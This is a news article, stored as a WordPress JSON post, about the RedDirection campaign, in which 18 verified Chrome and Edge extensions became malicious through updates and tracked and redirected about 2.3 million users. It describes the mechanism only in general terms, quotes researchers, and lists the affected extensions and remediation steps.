{"id":3911,"date":"2025-07-09T12:26:02","date_gmt":"2025-07-09T12:26:02","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=3911"},"modified":"2025-07-09T12:26:02","modified_gmt":"2025-07-09T12:26:02","slug":"verified-featured-and-malicious-reddirection-campaign-reveals-browser-marketplace-failures","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=3911","title":{"rendered":"Verified, featured, and malicious: RedDirection campaign reveals browser marketplace failures"},"content":{"rendered":"
\n
\n
\n
\n
<\/div>\n

A widespread browser hijacking campaign has infected over 2.3 million users through 18 malicious extensions available on Google Chrome and Microsoft Edge.<\/p>\n

Dubbed \u201cRedDirection\u201d by researchers at Koi Security, the operation exploited trust indicators such as verified badges, high ratings, and featured placement to remain undetected across both browser ecosystems.<\/p>\n

Koi researchers described the operation as one of the largest browser-based malware campaigns they have seen to date.<\/p>\n

Among the extensions identified, \u201cColor Picker, Eyedropper \u2014 Geco colorpick\u201d stood out with more than 100,000 installs, over 800 positive reviews, and verified status in the Chrome Web Store. Despite its legitimate appearance and functional user interface, the extension was found to be capturing browsing activity and sending data to remote servers.<\/p>\n

Other extensions offered varied functionality \u2014 from emoji keyboards and weather forecasts to VPN proxies, dark themes, and volume boosters \u2014 but all contained similar surveillance and hijacking capabilities hidden in their code.<\/p>\n

\u201cThis isn\u2019t some obvious scam extension thrown together in a weekend,\u201d Idan Dardikman, researcher at Koi Security, said in a blog post about the malware-infested extension<\/a>. \u201cThis is a carefully crafted trojan horse that delivers exactly what it promises, while simultaneously hijacking your browser, tracking every website you visit, and maintaining a persistent command and control backdoor.\u201d<\/p>\n

Malicious code deployed through extension updates<\/h2>\n

Koi researchers found that most of the malicious extensions were not harmful at the time of initial publication. Instead, they became dangerous later through version updates, a technique that allowed them to operate undetected for long periods.<\/p>\n

\u201cDue to how Google and Microsoft handle browser extension updates, these malicious versions auto-installed silently for over 2.3 million users across both platforms \u2014 most of whom never clicked anything,\u201d Dardikman said in the post.<\/p>\n

The researchers said the incident highlights the risks of supply chain compromise within browser ecosystems. \u201cThe very mechanisms meant to ensure user safety \u2014 verified status, featured placement, seamless updates \u2014 ended up amplifying the malware\u2019s reach,\u201d he added.<\/p>\n

A Google spokesperson said, \u201cCan confirm all of the extensions on the Chrome Web Store have been removed.\u201d Microsoft did not comment on the development.<\/p>\n

Arjun Chauhan, practice director at Everest Group, said the campaign reflects a shift in attacker strategy. \u201cUnlike traditional supply chain attacks that target backend systems, this campaign infiltrated the very tools users trust daily \u2014 their browser extensions. The delayed activation of malicious code underscores a critical gap in enterprise security models.\u201d<\/p>\n

He noted that initial vetting is no longer enough. \u201cOrganizations must implement continuous monitoring of browser extensions, enforce strict permission controls, and educate employees about the risks associated with seemingly trustworthy tools. Adopting a zero-trust approach to browser extensions is now imperative.\u201d<\/p>\n

Browser hijacking and phishing risks<\/h2>\n

According to their research, the malicious code was embedded in each extension\u2019s background service worker and used browser APIs to monitor tab activity. Captured data, including URLs and unique tracking IDs, was sent to attacker-controlled servers, which in turn provided redirect instructions.<\/p>\n

The setup enabled several attack scenarios, including redirection to phishing pages, banking credential theft using cloned login sites, and fake update prompts delivered through hijacked meeting invitations.<\/p>\n

\u201cWith 2.3 million users under surveillance across 18 different extensions, the campaign creates a massive persistent man-in-the-middle capability that can be exploited at any moment,\u201d said Dardikman.<\/p>\n

Centralized infrastructure across platforms<\/h2>\n

The campaign spanned both Chrome and Edge, with each extension linked to its own command-and-control subdomain to create the appearance of separate actors. Researchers noted that all extensions were ultimately connected to a single coordinated network.<\/p>\n

Several extensions had also gained featured or verified status in both marketplaces, raising further concerns about the platforms\u2019 screening processes.<\/p>\n

Koi Security recommends that affected users uninstall the extensions immediately, clear browser data to remove tracking identifiers, run a full malware scan, and monitor online accounts for unusual activity. A full review of installed extensions is also advised.<\/p>\n

The known malicious extensions include \u201cColor Picker, Eyedropper \u2014 Geco colorpick,\u201d \u201cVPN Proxy to Unblock Discord Anywhere,\u201d \u201cEmoji keyboard online \u2014 copy&paste your emoji,\u201d \u201cFree Weather Forecast,\u201d \u201cUnlock Discord,\u201d \u201cDark Theme \u2014 Dark Reader for Chrome,\u201d \u201cVolume Max \u2014 Ultimate Sound Booster,\u201d \u201cUnblock TikTok \u2014 Seamless Access with One-Click Proxy,\u201d \u201cUnlock YouTube VPN,\u201d \u201cUnlock TikTok,\u201d and \u201cWeather.\u201d <\/p>\n

Marketplace gaps and long-term risks<\/h2>\n

The incident underscores systemic weaknesses in browser extension governance. Google and Microsoft\u2019s verification processes failed to detect the malware, even as some of the extensions received promotional placement and trust badges.<\/p>\n

\u201cAttackers have successfully exploited every trust signal users rely on \u2014 verification badges, install counts, featured placement, years of legitimate operation, and positive reviews,\u201d said Dardikman. \u201cThese credibility mechanisms were turned against the users.\u201d<\/p>\n

Chauhan added that platform-level changes are necessary. \u201cStatic analysis and manual reviews can\u2019t keep up with today\u2019s threats. To prevent similar campaigns, Google and Microsoft must invest in dynamic analysis, real-time extension monitoring, and more transparent update processes. Strengthening these areas is essential to restoring user trust.\u201d<\/p>\n

A broader security wake-up call<\/h2>\n

Researchers describe the campaign as a turning point for browser security. Rather than relying on quick-win attacks, threat actors behind RedDirection developed a patient, long-game infrastructure, allowing them to slip under detection for years before activating the malware.<\/p>\n

The timing is also notable. The exposure of the campaign comes just days after MITRE added \u201cIDE Extensions<\/a>\u201d as a new category in its ATT&CK framework, drawing attention to growing threats within third-party software ecosystems.<\/p>\n

\u201cIf browser extensions that pass every trust test can flip into malware overnight, the security model for managing them needs to change,\u201d Dardikman said in the blog post.<\/p>\n

More security news:<\/p>\n

Second espionage-linked cyberattack hits ICC, exposing persistent threats to global justice systems<\/a><\/p>\n

Scattered Spider shifts focus to airlines as strikes hit Hawaiian, WestJet \u2014 and now Qantas<\/a>><\/p><\/div>\n

AMI MegaRAC authentication bypass flaw is being exploitated, CISA warns
<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"

A widespread browser hijacking campaign has infected over 2.3 million users through 18 malicious extensions available on Google Chrome and Microsoft Edge. Dubbed \u201cRedDirection\u201d by researchers at Koi Security, the operation exploited trust indicators such as verified badges, high ratings, and featured placement to remain undetected across both browser ecosystems. Koi researchers described the operation […]<\/p>\n","protected":false},"author":0,"featured_media":3888,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-3911","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3911"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3911"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/3911\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/3888"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}